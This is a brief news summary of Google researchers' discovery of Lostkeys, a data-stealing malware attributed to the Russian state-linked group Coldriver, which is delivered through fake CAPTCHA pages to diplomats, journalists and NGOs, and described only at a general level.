Russian state-linked Coldriver spies add new malware to operation

by

Russian state-linked Coldriver spies add new malware to operation

Researchers from Google have unearthed a new malware called Lostkeys, attributed to the Russian state-backed hacking group known as Coldriver. This addition marks a notable presence in their ongoing espionage efforts, primarily targeting high-profile figures through sophisticated phishing campaigns.

Key Points

  • The new malware, Lostkeys, was observed in attacks as recently as April 2025.
  • Coldriver has been implicated in espionage activities against diplomats, military advisers, journalists, and NGOs related to NATO.
  • Lostkeys can steal files with specific extensions and directories, while also transmitting system information to its operators.
  • The malware is delivered via a fraudulent CAPTCHA verification page, tricking victims into executing malicious code.
  • Coldriver mainly focuses on credential theft to access sensitive emails and documents.

Content Summary

Coldriver, a hacking group associated with Russian intelligence, has expanded its arsenal with a new malware, Lostkeys, designed for espionage. Discovered by Google researchers, this malware is utilised primarily for stealing data from high-profile individuals and organisations critical of the Russian regime. It operates through a phishing tactic that mimics legitimate online CAPTCHA forms to install malicious code on victims’ systems. Historically, Coldriver has targeted various professionals and sectors opposed to Russian policies, particularly in Eastern Europe and the US.

Context and Relevance

This article sheds light on the evolving tactics employed by cyber espionage groups linked to state actors, particularly in today’s geopolitical landscape. As digital threats increase, it’s crucial for individuals and organisations to stay informed about such developments, especially those that target key societal roles like diplomats and journalists.

Why should I read this?

If you’re interested in cybersecurity, geopolitics, or just love staying ahead of the latest threats, this article is a must-read. The insights into Coldriver’s operations and the specifics of the Lostkeys malware give you a behind-the-scenes look at the relentless cyber warfare shaping today’s global relations. It’s like having a front-row seat to the digital battleground!